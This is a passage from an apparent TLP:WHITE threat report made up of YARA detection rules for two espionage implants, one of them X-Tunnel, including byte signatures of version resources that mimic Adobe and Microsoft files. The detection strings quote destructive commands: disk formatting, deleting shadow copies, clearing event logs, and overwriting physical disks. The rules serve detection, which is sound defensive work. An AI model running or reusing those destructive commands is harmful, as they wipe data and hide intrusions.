00 53 00 74 00 61 00 74 00 65 00 20 00 4E 00 65 00 74 00 77 00 6F 00 72 00 6B 00 73 00 00 00 00 00
62 00 1D 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F
00 6E 00 00 00 00 00 41 00 64 00 6F 00 62 00 65 00 20 00 46 00 6C 00 61 00 73 00 68 00 20 00 50 00
6C 00 61 00 79 00 65 00 72 00 20 00 49 00 6E 00 73 00 74 00 61 00 6C 00 6C 00 65 00 72 00 00 00 00
00 30 00 08 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00
33 00 2E 00 33 00 2E 00 32 00 2E 00 34 00 00 00 32 00 09 00 01 00 49 00 6E 00 74 00 65 00 72 00 6E
00 61 00 6C 00 4E 00 61 00 6D 00 65 00 00 00 68 00 6F 00 73 00 74 00 2E 00 65 00 78 00 65 00 00 00
00 00 76 00 29 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68
00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00 20 00 41
00 64 00 6F 00 62 00 65 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00 73 00 20 00 49 00 6E 00 63 00
6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 65 00 64 00 00 00 00 00 3A 00 09 00 01 00 4F 00 72 00 69
00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 68 00 6F 00
73 00 74 00 2E 00 65 00 78 00 65 00 00 00 00 00 5A 00 1D 00 01 00 50 00 72 00 6F 00 64 00 75 00 63
00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 41 00 64 00 6F 00 62 00 65 00 20 00 46 00 6C 00 61 00
73 00 68 00 20 00 50 00 6C 00 61 00 79 00 65 00 72 00 20 00 49 00 6E 00 73 00 74 00 61 00 6C 00 6C
00 65 00 72 00 00 00 00 00 34 00 08 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72
00 73 00 69 00 6F 00 6E 00 00 00 33 00 2E 00 33 00 2E 00 32 00 2E 00 34 00 00 00 44 00 00 00 00 00
56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 00 00 00 54
00 72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 E4 04 46 45 32 58}
$b3 = {C8 02 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49
00 4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 01 00 05 00 88 15 28 0A 01 00 05 00 88 15
28 0A 17 00 00 00 00 00 00 00 04 00 04 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00
01 00 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 04
02 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34 00 65 00 34 00 00 00 4C 00 16 00 01 00 43 00 6F 00
6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73
00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 00 00
48 00 10 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 00
6E 00 00 00 00 00 49 00 44 00 45 00 20 00 50 00 6F 00 72 00 74 00 20 00 44 00 72 00 69 00 76 00 65 00
72 00 00 00 62 00 21 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00
00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 20 00 28 00
23 of 56
23 of 56
TLP:WHITE
TLP:WHITE
78 00 70 00 73 00 70 00 2E 00 30 00 38 00 30 00 34 00 31 00 33 00 2D 00 30 00 38 00 35 00 32 00 29
00 00 00 00 00 4A 00 13 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00
67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00
20 00 32 00 30 00 30 00 39 00 00 00 00 00 66 00 23 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00
4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 57
00 69 00 6E 00 64 00 6F 00 77 00 73 00 20 00 4F 00 70 00 65 00 72 00 61 00 74 00 69 00 6E 00 67 00
20 00 53 00 79 00 73 00 74 00 65 00 6D 00 00 00 00 00 40 00 0E 00 01 00 50 00 72 00 6F 00 64 00 75
00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00
30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 44 00 00 00 01 00 56 00 61 00 72 00 46 00 69 00 6C 00
65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 00 00 00 54 00 72 00 61 00 6E 00 73 00 6C 00 61
00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 E4 04}
$b4 = {9C 03 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49
00 4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 01 00 06 00 01 40 B0 1D 01 00 06 00 01 40
B0 1D 3F 00 00 00 00 00 00 00 04 00 04 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 FA 02 00
00 01 00 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00
D6 02 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34 00 42 00 30 00 00 00 4C 00 16 00 01 00 43 00 6F
00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00
73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 00
00 58 00 18 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F
00 6E 00 00 00 00 00 52 00 65 00 67 00 69 00 73 00 74 00 72 00 79 00 20 00 45 00 64 00 69 00 74 00 6F
00 72 00 20 00 55 00 74 00 69 00 6C 00 69 00 74 00 79 00 00 00 6C 00 26 00 01 00 46 00 69 00 6C 00
65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 36 00 2E 00 31 00 2E 00 37 00 36 00 30
00 30 00 2E 00 31 00 36 00 33 00 38 00 35 00 20 00 28 00 77 00 69 00 6E 00 37 00 5F 00 72 00 74 00
6D 00 2E 00 30 00 39 00 30 00 37 00 31 00 33 00 2D 00 31 00 32 00 35 00 35 00 29 00 00 00 3A 00 0D
00 01 00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00 61 00 6D 00 65 00 00 00 72 00 65 00
67 00 65 00 64 00 74 00 33 00 32 00 2E 00 65 00 78 00 65 00 00 00 00 00 80 00 2E 00 01 00 4C 00 65
00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00
69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00
69 00 6F 00 6E 00 2E 00 20 00 41 00 6C 00 6C 00 20 00 72 00 69 00 67 00 68 00 74 00 73 00 20 00 72
00 65 00 73 00 65 00 72 00 76 00 65 00 64 00 2E 00 00 00 42 00 0D 00 01 00 4F 00 72 00 69 00 67 00
69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 72 00 65 00 67 00 65
00 64 00 74 00 33 00 32 00 2E 00 65 00 78 00 65 00 00 00 00 00 6A 00 25 00 01 00 50 00 72 00 6F 00
64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F
00 66 00 74 00 AE 00 20 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 AE 00 20 00 4F 00 70 00 65 00
72 00 61 00 74 00 69 00 6E 00 67 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00 00 00 00 00 42 00 0F
00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 36
00 2E 00 31 00 2E 00 37 00 36 00 30 00 30 00 2E 00 31 00 36 00 33 00 38 00 35 00 00 00 00 00 44 00
00 00 01 00 56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04
00 00 00 54 00 72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 B0 04}
$b5 = {78 03 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49
00 4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 00 00 05 00 6A 44 B1 1D 00 00 05 00 6A
44 B1 1D 3F 00 00 00 00 00 00 00 04 00 04 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D6 02
00 00 01 00 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00
24 of 56
24 of 56
TLP:WHITE
TLP:WHITE
00 B2 02 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34 00 42 00 30 00 00 00 4C 00 16 00 01 00 43 00
6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F
00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00
00 00 4E 00 13 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00
6F 00 6E 00 00 00 00 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 AE 00 53 00 79 00 73 00 55 00 74
00 69 00 6C 00 69 00 74 00 79 00 00 00 00 00 72 00 29 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00
72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 35 00 2E 00 30 00 2E 00 37 00 36 00 30 00 31 00 2E 00 31
00 37 00 35 00 31 00 34 00 20 00 28 00 77 00 69 00 6E 00 37 00 73 00 70 00 31 00 5F 00 72 00 74 00
6D 00 2E 00 31 00 30 00 31 00 31 00 31 00 39 00 2D 00 31 00 38 00 35 00 30 00 29 00 00 00 00 00 30
00 08 00 01 00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00 61 00 6D 00 65 00 00 00 6D 00
73 00 69 00 65 00 78 00 65 00 63 00 00 00 80 00 2E 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F
00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00
6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 2E 00 20
00 41 00 6C 00 6C 00 20 00 72 00 69 00 67 00 68 00 74 00 73 00 20 00 72 00 65 00 73 00 65 00 72 00
76 00 65 00 64 00 2E 00 00 00 40 00 0C 00 01 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46
00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 6D 00 73 00 69 00 65 00 78 00 65 00 63 00 2E 00
65 00 78 00 65 00 00 00 58 00 1C 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D
00 65 00 00 00 00 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 53 00 79 00 73 00 55 00 74 00 69 00
6C 00 69 00 74 00 79 00 20 00 2D 00 20 00 55 00 6E 00 69 00 63 00 6F 00 64 00 65 00 00 00 42 00 0F
00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 35
00 2E 00 30 00 2E 00 37 00 36 00 30 00 31 00 2E 00 31 00 37 00 35 00 31 00 34 00 00 00 00 00 44 00
00 00 01 00 56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04
00 00 00 54 00 72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 B0 04}
$b6 = {D4 02 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49
00 4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 01 00 05 00 88 15 28 0A 01 00 05 00 88 15
28 0A 17 00 00 00 00 00 00 00 04 00 04 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 02 00 00
01 00 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 10
02 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34 00 65 00 34 00 00 00 4C 00 16 00 01 00 43 00 6F 00
6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73
00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 00 00
4E 00 13 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F
00 6E 00 00 00 00 00 53 00 65 00 72 00 69 00 61 00 6C 00 20 00 50 00 6F 00 72 00 74 00 20 00 44 00
72 00 69 00 76 00 65 00 72 00 00 00 00 00 62 00 21 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00
73 00 69 00 6F 00 6E 00 00 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35
00 31 00 32 00 20 00 28 00 78 00 70 00 73 00 70 00 2E 00 30 00 38 00 30 00 34 00 31 00 33 00 2D 00
30 00 38 00 35 00 32 00 29 00 00 00 00 00 4A 00 13 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F
00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74
00 20 00 28 00 43 00 29 00 20 00 32 00 30 00 30 00 34 00 00 00 00 00 6A 00 25 00 01 00 50 00 72 00 6F
00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00
6F 00 66 00 74 00 AE 00 20 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 AE 00 20 00 4F 00 70 00 65
00 72 00 61 00 74 00 69 00 6E 00 67 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00 00 00 00 00 40 00
0E 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00
00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 44 00 00 00
25 of 56
25 of 56
TLP:WHITE
TLP:WHITE
01 00 56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 00 00
00 54 00 72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 E4 04}
condition:
(uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and (((any of ($a*)) and
(uint32(uint32(0x3C)+8) == 0x00000000)) or (for any of ($b*): ($ in
(uint32(uint32(0x3C)+248+(40*(uint16(uint32(0x3C)+6)1)+20))..(uint32(uint32(0x3C)+248+(40*(uint16(uint32(0x3C)+6)1)+20))+uint32(uint32(0x3C)+248+(40*(uint16(uint32(0x3C)+6)-1)+16)))))))
Rule IMPLANT_4_v4
strings:
$DK_format1 = "/c format %c: /Y /Q" ascii
$DK_format2 = "/c format %c: /Y /X /FS:NTFS" ascii
$DK_physicaldrive = "PhysicalDrive%d" wide
$DK_shutdown = "shutdown /r /t %d"
$MZ = {4d 5a}
condition:
$MZ at 0 and all of ($DK*)
Rule IMPLANT_4_v5
strings:
$GEN_HASH = {0F BE C9 C1 C0 07 33 C1}
condition:
26 of 56
26 of 56
TLP:WHITE
TLP:WHITE
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) ==
0x46445025 or uint32(1) == 0x6674725C) and all of them
Rule IMPLANT_4_v6
strings:
$STR1 = "DispatchCommand" wide ascii
$STR2 = "DispatchEvent" wide ascii
condition:
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) ==
0x46445025 or uint32(1) == 0x6674725C) and all of them
Rule IMPLANT_4_v7
strings:
$sb1 = {C7 [1-5] 33 32 2E 64 C7 [1-5] 77 73 32 5F 66 C7 [1-5] 6C 6C}
$sb2 = {C7 [1-5] 75 73 65 72 C7 [1-5] 33 32 2E 64 66 C7 [1-5] 6C 6C}
$sb3 = {C7 [1-5] 61 64 76 61 C7 [1-5] 70 69 33 32 C7 [1-5] 2E 64 6C 6C}
$sb4 = {C7 [1-5] 77 69 6E 69 C7 [1-5] 6E 65 74 2E C7 [1-5] 64 6C 6C}
$sb5 = {C7 [1-5] 73 68 65 6C C7 [1-5] 6C 33 32 2E C7 [1-5] 64 6C 6C}
$sb6 = {C7 [1-5] 70 73 61 70 C7 [1-5] 69 2E 64 6C 66 C7 [1-5] 6C}
$sb7 = {C7 [1-5] 6E 65 74 61 C7 [1-5] 70 69 33 32 C7 [1-5] 2E 64 6C 6C}
$sb8 = {C7 [1-5] 76 65 72 73 C7 [1-5] 69 6F 6E 2E C7 [1-5] 64 6C 6C}
$sb9 = {C7 [1-5] 6F 6C 65 61 C7 [1-5] 75 74 33 32 C7 [1-5] 2E 64 6C 6C}
$sb10 = {C7 [1-5] 69 6D 61 67 C7 [1-5] 65 68 6C 70 C7 [1-5] 2E 64 6C 6C}
27 of 56
27 of 56
TLP:WHITE
TLP:WHITE
condition:
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) ==
0x46445025 or uint32(1) == 0x6674725C) and 3 of them
Rule IMPLANT_4_v8
strings:
$f1 = {5E 81 EC 04 01 00 00 8B D4 68 04 01 00 00 52 6A 00 FF 57 1C 8B D4 33 C9 03 D0 4A 41
3B C8 74 05 80 3A 5C 75 F5 42 81 EC 04 01 00 00 8B DC 52 51 53 68 04 01 00 00 FF 57 20 59 5A 66
C7 04 03 5C 20 56 57 8D 3C 03 8B F2 F3 A4 C6 07 00 5F 5E 33 C0 50 68 80 00 00 00 6A 02 50 50 68
00 00 00 40 53 FF 57 14 53 8B 4F 4C 8B D6 33 DB 30 1A 42 43 3B D9 7C F8 5B 83 EC 04 8B D4 50
6A 00 52 FF 77 4C 8B D6 52 50 FF 57 24 FF 57 18}
$f2 = {5E 83 EC 1C 8B 45 08 8B 4D 08 03 48 3C 89 4D E4 89 75 EC 8B 45 08 2B 45 10 89 45 E8
33 C0 89 45 F4 8B 55 0C 3B 55 F4 0F 86 98 00 00 00 8B 45 EC 8B 4D F4 03 48 04 89 4D F4 8B 55 EC
8B 42 04 83 E8 08 D1 E8 89 45 F8 8B 4D EC 83 C1 08 89 4D FC}
$f3 = {5F 8B DF 83 C3 60 2B 5F 54 89 5C 24 20 8B 44 24 24 25 00 00 FF FF 66 8B 18 66 81 FB
4D 5A 74 07 2D 00 00 01 00 EB EF 8B 48 3C 03 C8 66 8B 19 66 81 FB 50 45 75 E0 8B E8 8B F7 83
EC 60 8B FC B9 60 00 00 00 F3 A4 83 EF 60 6A 0D 59 E8 88 00 00 00 E2 F9 68 6C 33 32 00 68 73 68
65 6C 54 FF 57}
$a1 = {83 EC 04 60 E9 1E 01 00 00}
condition:
$a1 at entrypoint or any of ($f*)
Rule IMPLANT_4_v9
strings:
$a = "wevtutil clear-log" ascii wide nocase
$b = "vssadmin delete shadows" ascii wide nocase
28 of 56
28 of 56
TLP:WHITE
TLP:WHITE
$c = "AGlobal\\23d1a259-88fa-41df-935f-cae523bab8e6" ascii wide nocase
$d = "Global\\07fd3ab3-0724-4cfd-8cc2-60c0e450bb9a" ascii wide nocase
//$e = {57 55 33 c9 51 8b c3 99 57 52 50}
$openPhysicalDiskOverwriteWithZeros = { 57 55 33 C9 51 8B C3 99 57 52 50 E8 ?? ?? ?? ?? 52 50
E8 ?? ?? ?? ?? 83 C4 10 84 C0 75 21 33 C0 89 44 24 10 89 44 24 14 6A 01 8B C7 99 8D 4C 24 14 51 52
50 56 FF 15 ?? ?? ?? ?? 85 C0 74 0B 83 C3 01 81 FB 00 01 00 00 7C B6 }
$f = {83 c4 0c 53 53 6a 03 53 6a 03 68 00 00 00 c0}
condition:
($a and $b) or $c or $d or ($openPhysicalDiskOverwriteWithZeros and $f)
Rule IMPLANT_4_v10
strings:
$ = {A1B05C72}
$ = {EB3D0384}
$ = {6F45594E}
$ = {71815A4E}
$ = {D5B03E72}
$ = {6B43594E}
$ = {F572993D}
$ = {665D9DC0}
$ = {0BE7A75A}
$ = {F37443C5}
$ = {A2A474BB}
$ = {97DEEC67}
$ = {7E0CB078}
29 of 56
29 of 56
TLP:WHITE
TLP:WHITE
$ = {9C9678BF}
$ = {4A37A149}
$ = {8667416B}
$ = {0A375BA4}
$ = {DC505A8D}
$ = {02F1F808}
$ = {2C819712}
condition:
uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550 and 15 of them
Rule IMPLANT_4_v11
strings:
$ = "/c format %c: /Y /X /FS:NTFS"
$ = ".exe.sys.drv.doc.docx.xls.xlsx.mdb.ppt.pptx.xml.jpg.jpeg.ini.inf.ttf" wide
$ = ".dll.exe.xml.ttf.nfo.fon.ini.cfg.boot.jar" wide
".crt.bin.exe.db.dbf.pdf.djvu.doc.docx.xls.xlsx.jar.ppt.pptx.tib.vhd.iso.lib.mdb.accdb.sql.mdf.xml.rtf.ini.cf
g.boot.txt.rar.msi.zip.jpg.bmp.jpeg.tiff" wide
$tempfilename = "%ls_%ls_%ls_%d.~tmp" ascii wide
condition:
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) ==
0x46445025 or uint32(1) == 0x6674725C) and 2 of them
Rule IMPLANT_4_v12
30 of 56
30 of 56
TLP:WHITE
TLP:WHITE
strings:
$CMP1 = {81 ?? 4D 5A 00 00 }
$SUB1 = {81 ?? 00 10 00 00}
$CMP2 = {66 81 38 4D 5A}
$SUB2 = {2D 00 10 00 00}
$HAL = "HAL.dll"
$OUT = {E6 64 E9 ?? ?? FF FF}
condition:
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) ==
0x46445025 or uint32(1) == 0x6674725C) and ($CMP1 or $CMP2) and ($SUB1 or $SUB2) and $OUT
and $HAL
Rule IMPLANT_4_v13
strings:
$XMLDOM1 = {81 BF 33 29 36 7B D2 11 B2 0E 00 C0 4F 98 3E 60}
$XMLDOM2 = {90 BF 33 29 36 7B D2 11 B2 0E 00 C0 4F 98 3E 60}
$XMLPARSE = {8B 06 [0-2] 8D 55 ?C 52 FF 75 08 [0-2] 50 FF 91 04 01 00 00 66 83 7D ?C FF 75
3? 8B 06 [0-2] 8D 55 F? 52 50 [0-2] FF 51 30 85 C0 78 2?}
$EXP1 = "DispatchCommand"
$EXP2 = "DispatchEvent"
$BDATA = {85 C0 74 1? 0F B7 4? 06 83 C? 28 [0-6] 72 ?? 33 C0 5F 5E 5B 5D C2 08 00 8B 4?
0? 8B 4? 0? 89 01 8B 4? 0C 03 [0-2] EB E?}
condition:
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) ==
0x46445025 or uint32(1) == 0x6674725C) and all of them
31 of 56
31 of 56
TLP:WHITE
TLP:WHITE
The following YARA rules detect X-Tunnel, referred to as IMPLANT 5 with rule naming convention.
IMPLANT 5 Rules:
Rule IMPLANT_5_v1
strings:
$hexstr = {2D 00 53 00 69 00 00 00 2D 00 53 00 70 00 00 00 2D 00 55 00 70 00 00 00 2D 00 50 00
69 00 00 00 2D 00 50 00 70 00 00 00}
$UDPMSG1 = "error 2005 recv from server UDP - %d\x0a"
$TPSMSG1 = "error 2004 send to TPS - %d\x0a"
$TPSMSG2 = "error 2003 recv from TPS - %d\x0a"
$UDPMSG2 = "error 2002 send to server UDP - %d\x0a"
condition:
any of them
Rule IMPLANT_5_v2
strings:
$key0 = { 987AB999FE0924A2DF0A412B14E26093746FCDF9BA31DC05536892C33B116AD3 }
$key1 = { 8B236C892D902B0C9A6D37AE4F9842C3070FBDC14099C6930158563C6AC00FF5 }
$key2 = { E47B7F110CAA1DA617545567EC972AF3A6E7B4E6807B7981D3CFBD3D8FCC3373 }
$key3 = { 48B284545CA1FA74F64FDBE2E605D68CED8A726D05EBEFD9BAAC164A7949BDC1 }
$key4 = { FB421558E30FCCD95FA7BC45AC92D2991C44072230F6FBEAA211341B5BF2DC56 }
$key5 = { 34F1AE17017AF16021ADA5CE3F77675BBC6E7DEC6478D6078A0B22E5FDFF3B31 }
32 of 56
32 of 56
TLP:WHITE
TLP:WHITE
$key6 = { F0EA48F164395186E6F754256EBB812A2AFE168E77ED9501F8B8E6F5B72126A7 }
$key7 = { 0B6E9970A8EAF68EE14AB45005357A2F3391BEAA7E53AB760B916BC2B3916ABE }
$key8 = { FF032EA7ED2436CF6EEA1F741F99A3522A61FDA8B5A81EC03A8983ED1AEDAB1A }
$key9 = { F0DAC1DDFEF7AC6DE1CBE1006584538FE650389BF8565B32E0DE1FFACBCB14BB }
$key10 = { A5D699A3CD4510AF11F1AF767602055C523DF74B94527D74319D6EFC6883B80D }
$key11 = { 5951B02696C1D5A7B2851D28872384DA607B25F4CEA268FF3FD7FBA75AB3B4B3 }
$key12 = { 0465D99B26AF42D8346001BB838595E301BAD8CF5D40CE9C17C944717DF82481 }
$key13 = { 5DFE1C83AD5F5CE1BF5D9C42E23225E3ECFDB2493E80E6554A2AC7C722EB4880 }
$key14 = { E9650396C45F7783BC14C59F46EA8232E8357C26B5627BFF8C42C6AE2E0F2E17 }
$key15 = { 7432AE389125BB4E3980ED7F6A6FB252A42E785A90F4591C3620CA642FF97CA3 }
$key16 = { 2B2ADBBC4F960A8916F7088067BAD30BE84B65783FBF9476DF5FDA0E5856B183 }
$key17 = { 808C3FD0224A59384161B8A81C8BB404D7197D16D8118CB77067C5C8BD764B3E }
$key18 = { 028B0E24D5675C16C815BFE4A073E9778C668E65771A1CE881E2B03F58FC7D5B }
$key19 = { 878B7F5CF2DC72BAF1319F91A4880931EE979665B1B24D3394FE72EDFAEF4881 }
$key20 = { 7AC7DD6CA34F269481C526254D2F563BC6ECA1779FEEAA33EC1C20E60B686785 }
$key21 = { 3044F1D394186815DD8E3A2BBD9166837D07FA1CF6A550E2C170C9CDD9305209 }
$key22 = { 7544DC095C441E39D258648FE9CB1267D20D83C8B2D3AB734474401DA4932619 }
$key23 = { D702223347406C1999D1A9829CBBE96EC86D377A40E2EE84562EA1FAC1C71498 }
$key24 = { CA36CB1177382A1009D392A58F7C1357E94AD2292CC0AE82EE4F7DB0179148E1 }
$key25 = { C714F23E4C1C4E55F0E1FA7F5D0DD64658A86F84681D07576D840784154F65DC }
$key26 = { 63571BAF736904634AFEE2A70CB9ED64615DE8CA7AEF21E773286B8877D065DB }
$key27 = { 27808A9BE98FFE348DE1DB999AC9FDFB26E6C5A0D5E688490EF3D186C43661EB }
$key28 = { B6EB86A07A85D40866AFA100789FFB9E85C13F5AA7C7A3B6BA753C7EAB9D6A62 }
$key29 = { 88F0020375D60BDB85ACDBFE4BD79CD098DB2B3FA2CEF55D4331DBEFCE455157 }
$key30 = { 36535AAB296587AE1162AC5D39492DD1245811C72706246A38FF590645AA5D7B }
$key31 = { FDB726261CADD52E10818B49CAB81BEF112CB63832DAA26AD9FC711EA6CE99A4 }
$key32 = { 86C0CAA26D9FD07D215BC7EB14E2DA250E905D406AFFAB44FB1C62A2EAFC4670 }
$key33 = { BC101329B0E3A7D13F6EBC535097785E27D59E92D449D6D06538725034B8C0F0 }
33 of 56
33 of 56
TLP:WHITE
TLP:WHITE
$key34 = { C8D31A78B7C149F62F06497F9DC1DDC4967B566AC52C3A2A65AC7A99643B8A2D }
$key35 = { 0EA4A5C565EFBB94F5041392C5F0565B6BADC630D9005B3EADD5D81110623E1F }
